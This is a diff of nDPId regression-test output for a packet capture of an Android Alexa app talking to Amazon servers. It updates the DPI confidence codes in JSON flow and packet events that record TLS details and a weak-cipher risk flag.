+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088631,"flow_last_seen":1490976088854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088854,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1490976088880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/dAAEAGPiKsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93BQAAAgQFtAQCCAoA9mEIAAAAAAEDAwg="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088937,"flow_last_seen":1490976088937,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088937,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1490976088937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088937,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTlAAEAGCbasECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZowAAAgQFtAQCCAoA9mENAAAAAAEDAwg="} 
@@ -495,8 +495,8 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1490976089426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089426,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZGdAAEAG4oesECrYNF7ohsHeAFAhsQVZAAAAAKAC\/\/8IxQAAAgQFtAQCCAoA9mE+AAAAAAEDAwg="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1490976089930,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTpAAEAGCbWsECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZPwAAAgQFtAQCCAoA9mFxAAAAAAEDAwg="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1490976089963,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089963,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFNAAEAGMpysECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/E\/wAAAgQFtAQCCAoA9mFzAAAAAAEDAwg="} 
-01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088631,"flow_last_seen":1490976090037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088605,"flow_last_seen":1490976090037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088631,"flow_last_seen":1490976090037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088605,"flow_last_seen":1490976090037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwtKtAAOcG6040XuiGrBAq2AG7spNBzzb30hct0XASH\/5DQAAAAgQFtAEDAwY="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe6ZAAOcGJFQ0XuiGrBAq2AG7so\/BFRS5iAxcNXASH\/4B4wAAAgQFtAEDAwY="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwa1pAAOcGNKA0XuiGrBAq2ABQwd5KW8E7IbEFWnASH\/57bQAAAgQFtAEDAwY="} 
@@ -507,50 +507,50 @@ 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTPxAAEAG+gasECrYNF7ohrKTAbvSFy3RQc82+FAQAVeNsQAA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZGhAAEAG4pqsECrYNF7ohsHeAFAhsQVaSlvBPFAQAVfF3gAA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo35FAAEAGZ3GsECrYNF7ohrKSAbuabb67n5yC1lAQAVeKxgAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1322,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089239,"flow_last_seen":1490976090191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088937,"flow_last_seen":1490976090191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1324,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089227,"flow_last_seen":1490976090192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1325,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976088958,"flow_last_seen":1490976090192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089426,"flow_last_seen":1490976090196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976090196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) 
Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1343,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089239,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976088958,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1346,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089227,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1322,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089239,"flow_last_seen":1490976090191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088937,"flow_last_seen":1490976090191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1324,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089227,"flow_last_seen":1490976090192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1325,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976088958,"flow_last_seen":1490976090192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089426,"flow_last_seen":1490976090196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976090196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 
+01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1343,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089239,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976088958,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1346,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089227,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 